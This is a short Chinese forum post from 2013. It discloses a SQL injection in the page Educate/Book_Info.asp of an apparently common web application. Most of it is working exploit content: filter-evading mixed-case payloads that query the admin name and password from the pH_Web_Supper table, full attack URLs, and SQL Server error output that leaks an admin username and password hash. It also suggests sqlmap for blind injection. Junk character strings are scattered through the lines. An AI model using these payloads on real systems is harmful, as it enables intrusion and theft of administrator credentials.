漏洞出现在Educate/Book_Info.asp 4 o; V3 K% _8 C" n3 ^" l
8 I7 ~/ [7 O7 g; `1 |" S8 Z此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出+ j; l4 p, t5 }' K% m* ]3 \6 e
. T+ F; ~+ r- ~
exp:如下+ x4 @% G% X" Z( s- a0 p
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
- z/ }3 Y; E% n) m查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
/ l( P0 N% d) J3 }+ V, J' O# ]% E
9 i0 B( h" e$ p; c+ j* n/ ]4 bhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
$ [' x. K4 c( `
. B8 i9 z- l2 o( H& J, x; t; lMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
$ L0 \7 o( D9 y! h
! w$ F- @. F1 `) N! H将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。$ j: s8 \( a. `6 [
! z0 {0 ]/ O, N7 R/Educate/Book_Info.asp,行 8
) @) T3 J1 M) t! X+ w, T 8 N; I3 p3 ~4 V. V6 q0 A4 l! o2 @
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- ^, D# v3 _' y" G' m+ K* @) @, L 0 n- l V e$ y5 c! t4 m& j# O. y
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
! i2 j: Q) k: k/ {% ^, P7 X$ e
- r3 D# y- I; L将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
+ F m$ n/ A- S4 g
/ ~" {* f! P6 D. b" E) [) G/Educate/Book_Info.asp,行 8
! X* X$ e8 N8 f* j- T |
发表于 2013-2-16 21:44:16
收藏
支持
反对